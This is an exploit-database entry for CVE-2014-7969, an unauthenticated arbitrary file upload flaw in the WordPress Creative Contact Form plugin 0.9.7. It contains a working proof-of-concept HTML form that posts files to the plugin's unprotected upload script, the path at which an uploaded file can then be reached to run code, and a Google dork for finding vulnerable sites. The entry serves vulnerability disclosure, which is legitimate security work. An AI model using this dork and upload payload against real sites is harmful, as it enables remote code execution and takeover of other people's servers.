Lucene search

K
exploitpackGianni AngelozziEXPLOITPACK:34CBE433D640F6970E969B11402E2D6A
HistoryOct 08, 2014 - 12:00 a.m.

WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload

2014-10-0800:00:00
Gianni Angelozzi
20

EPSS

0.036

Percentile

91.7%

WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload

==========================================================
"Creative Contact Form - The Best WordPress Contact Form Builder" -
Arbitrary File Upload

# Author: Gianni Angelozzi
# Date: 08/10/2014
# Remote: Yes
# Vendor Homepage: https://profiles.wordpress.org/creative-solutions-1/
# Software Link: https://wordpress.org/plugins/sexy-contact-form/
# CVE: CVE-2014-7969
# Version: all including latest 0.9.7
# Google Dork: inurl:"wp-content/plugins/sexy-contact-form"

This plugin includes a PHP script to accept file uploads that doesn't
perform any security check, thus allowing unauthenticated remote file
upload, leading to remote code execution. All versions are affected.
Uploaded files are stored with their original file name.
==========================================================
PoC
==========================================================
Trigger a file upload

<form method="POST" action="
http://TARGET/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Then the file is accessible under

http://TARGET/wp-content/plugins/sexy-contact-form/includes/fileupload/files/FILENAME
==========================================================
EOF


Thanks,

Gianni Angelozzi

EPSS

0.036

Percentile

91.7%

Related for EXPLOITPACK:34CBE433D640F6970E969B11402E2D6A